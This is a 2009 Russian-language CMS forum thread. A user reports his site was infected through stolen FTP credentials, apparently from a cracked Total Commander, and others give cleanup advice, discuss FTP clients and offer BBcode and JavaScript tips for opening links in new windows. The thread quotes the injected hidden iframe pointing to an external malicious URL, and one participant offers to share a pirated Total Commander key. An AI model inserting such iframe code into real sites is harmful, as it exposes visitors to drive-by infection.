Хроники портирования с седа на кот
| Dayver |
|
|---|---|
# Альф : Возможно ли наколдовать что-то в .htaccess или пытать хостера?Уверен колдуй не колдуй с .htaccess, а если в php.ini не включено данное расширение то тут ниче кроме долгих и кровожадных пыток хостера ниче не поможет. # Альф : .......А что ж он матюкается(что ПВ библиотека не стоит....или что?)? Поподробнее тут нужно......... Pavlo Tkachenko aka Dayver
|
| Альф |
|
|---|---|
|
Блин горелый! Оказывается на работе загрузил в functions.php вирусню:
<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe> Перезалил файл - заработало! Стерильность нарушена - вот и вся причина. |
|
| This post was edited by Альф (2009-04-08 05:23, 15 years ago) |
| Dayver |
|
|---|---|
# Альф : Перезалил файл - заработало! Стерильность нарушена - вот и вся причина.Дайте угадаю стерильность нарушил TotalComander  Pavlo Tkachenko aka Dayver
|
| Альф |
|
|---|---|
|
Он самый. Новая напасть - перерыл всю базу, все файлы несколько раз, вычистил комп, менял пароль, но стоит включить Аваст - он блокирует сайт, говорит что заражен вирусом iframe и к любой строке приписывает {gzip} вот так /list.php?c=spravka\{gzip} Какие будут рекомендации? На сайте пытались регистрироваться китайские и американские граждане и даже переводили что-то переводчиком. Какого рожна им надо, басурманам? В рефералах отловил их, а во всех индексах появилось это
По ссылке не ходить, после прочтения сжечь! |
| Dayver |
|
|---|---|
|
Насколько я знаю ни один уважающий себя вебмастер не будет использоватьЧто тут могу сказать!? никогда и ни при каких условиях не юзайте тотал в качестве фтп клиента ... а если и будете использовать то дистрибутив нужно брать из 100% надежного источника без всяких сторонних кряков и т.п. ..... сам же могу порекомендовать FileZilla бесплатен, с русским языком на борту по надежности еще ни разу не подводил(при условии конечно что сам компьютер защищен хотябы антивиром).
По поводу же сайта совет один - удалите все файлы и заливайте все по новой с чистой машины. Pavlo Tkachenko aka Dayver
|
| motor2hg |
|
|---|---|
|
Дайвер зачем гонишь на Total Commander? Всю жизнь пользуюсь, если при взломе Альф открыл чёрную дверь, ну так не надо использовать украденное по, или вы уважаемые думаете, что хакеры его за просто так ломают?
Total Commander, если вы не хотите его покупать, можно использовать как есть просто кнопку нажимать или одолжить у кого нибудь кей файл и спокойно работать. Это раз, второе, от заразы можно избавится скачав антивирусную утилиту DrWeb - CureIT и проверить комп, те файлы которые она сложит в папку инфецированные проверить удалить строчки с вирусом и положить опять их на место. А вообще по жизни строгать сайты работая под Windows это тоже не будет делать ни один уважающий себя вебмастер ставте FreeBSD, Linux, это тоже всё бесплатно! К стати FileZilla мне абсолютно не нравится, она не понимает UTF8 имена файлов в отличии от gFTP *nix.ИМХО (Продолжая выводы Dayvera на счёт Total Commander) Короче кому надо TC рабочий с ключём дайте FTP и я залью его вам и вашим друзьямм! :) |
|
| This post was edited by motor2hg (2009-04-09 18:00, 15 years ago) |
| Dayver |
|
|---|---|
# motor2hg : Дайвер зачем гонишь на Total Commander? Всю жизнь пользуюсь, если при взломе Альф открыл чёрную дверь, ну так не надо использовать украденное по, или вы уважаемые думаете, что хакеры его за просто так ломают?Мотор чё ты взелся то? Я не гоню про тотал я просто констатирую факт .... или то, что я угадал причину "нарушения стерильности" есть тотал - просто случайность? Таких фактов как у Альфа по сети даже не тысячи, а десятки тысяч если не больше. Мотор, не дуйся, но это факт(ясно что причина того что эпидемия была именно с тоталом только потому что его используют миллионы людей в отличие от остальных фтп клиентов). Тем более я чётко написал что причина не в самом тотале, а в том как его ломают\крякают. Привык к Тоталу? любишь его? - ну так не качай его с первого попавшегося варезника, где тебе втюхают чёрт знает что. А спор про винды и линухи тут вообще не к месту. Зиллу я посоветовал лишь из личного опыта (ни единой проблемы с ним у меня не возникало...но это не значит что это панацея) .... никому своего мнения не навязываю, ставте что хотите ибо это ваши заботы (я лишь делюсь своим мнением). В итоге лучше почитать статьи, почему фришный софт часто не хуже, а даже лучше платного. И там нет необходимости, что-то крякать и ломать чем в свою очередь делать дыру собственными руками. Pavlo Tkachenko aka Dayver
|
| Альф |
|
|---|---|
|
C Total Commander`ом не было проблем, пока не появилась разновидность трояна, его использующая. FileZilla - как-то не очень мне. Заливал сайт с работы, а там все загажено вирусами было. Сайт придется грохать и перезаливать с чистой машины. Троян сидит в базе, тексты там в UTF8 и эта гадость где-то осталась. Потому, что базу копирую на комп, пытаюсь загнать на локалке - Аваст блокирет сразу, а базу отдельно сканит и не видит код. FTP-клиент выбираю еще не решил. Спасибо за советы и поддержку, я этот разговор не для пожаловаться здесь привел, а на поиск решения по защите от этой гадости. поскольку сам в php не спец, то есть вопрос, а именно -
спецы советуют вот что : Если помогает - надо добавить по-умолчанию в движок. Вобще - насколько это поможет и какие еще есть конструкции в php для запрета записи в индекс? Кроме cmod`a, конечно. Эта дрянь эволюционирует, кстати, научилась не тупо в индексы добавляться. Теперь анализирует код и лезет не в сам индекс, а в инклуды, если таковые присутствуют. И еще шифруется - бывает такое. |
| Dayver |
|
|---|---|
# Альф : Спасибо за советы и поддержку, я этот разговор не для пожаловаться здесь привел, а на поиск решения по защите от этой гадости. поскольку сам в php не спец, то есть вопрос, а именно -Та причем тут движок в частности и пхп в целом? если у вас украли пароли от фтп то с вашим сайтом сделают что угодно и пхп тут не поможет......даже если cmod пропишите соответствующие .... всеравно у тех кто украли пароль будут те же права на запись что и у вас ... а значит дело защиты сообственного сайта полностью в ваших руках ...... потому разговор о защите от такой пакости в ключе разговора о движке безсмыслен ..... если б речь шла о другом виде атаки и уязвимости - тогда да Pavlo Tkachenko aka Dayver
|
| Альф |
|
|---|---|
|
Можно на ты
 вопрос снимается с обсуждения.У меня два вопроса, на которые я не смог найти ответов на форуме. Первое - как сделать в редакторе обтекание картинок текстом и каким образом открывать ссылки в новом окне? Ткните в нужное место двига или плагина. |
|
| This post was edited by Альф (2009-04-20 19:13, 15 years ago) |
| Dayver |
|
|---|---|
|
Отвечу на второй вопрос
Админ-панель - Модули - ББкоды два ббкода url строки замены <a href="$1">$2</a> <a href="$1">$1</a>меняем на <a href="$1" target="_blank">$2</a> <a href="$1" target="_blank">$1</a>Обновляем и Очистить HTML-кэш Готово....сылки открываются в новом окне.... Первый вопрос решается по аналогии ... кстати ответ на него можно найти поиском  Pavlo Tkachenko aka Dayver
|
| NovoKain |
|
|---|---|
|
Dayver, страшно от девелопера такой бред слышать.
Вот немного глючное решение (внутренние ссылки SITE.com и www.SITE.com открывает в разных окнах) от Trustmaster'а Добавить сей код можно например в base.js хотя насколько я понимаю это очень легко оформляется в виде плагина. А по первому вопросу спасёт По центру, Растянуть, По правому краю, По левому краю если я правильно понял вопрос. |
| Dayver |
|
|---|---|
# NovoKain : Dayver, страшно от девелопера такой бред слышать.Это ж почему? Всмысле - почему бред? Кстати посмотрев тему в которой поднят вопрос обтекания картинок, увидел что Альф с ней уже знаком ... правда там ему не разяснили как конкретно применять указаное решение ..... своим предидущим постом я думаю я это сделал (убил так сказать двух зайцев) Pavlo Tkachenko aka Dayver
|
|
| This post was edited by Dayver (2009-04-21 01:11, 15 years ago) |
| NovoKain |
|
|---|---|
|
Dayver, по причине того что внутренние ссылки поставленные с помошью ббкода так же будут открыватся в новом окне. Я считаю что реализация на js не привязанная к ббкоду это самый оптимальный вариант. Хотя немного погорячился с эпитетом ибо в Коте система ббкодов не такая как в Сед
|
| Альф |
|
|---|---|
|
Вон оно как сделано! Спасибо за помощь. Помогло.
|
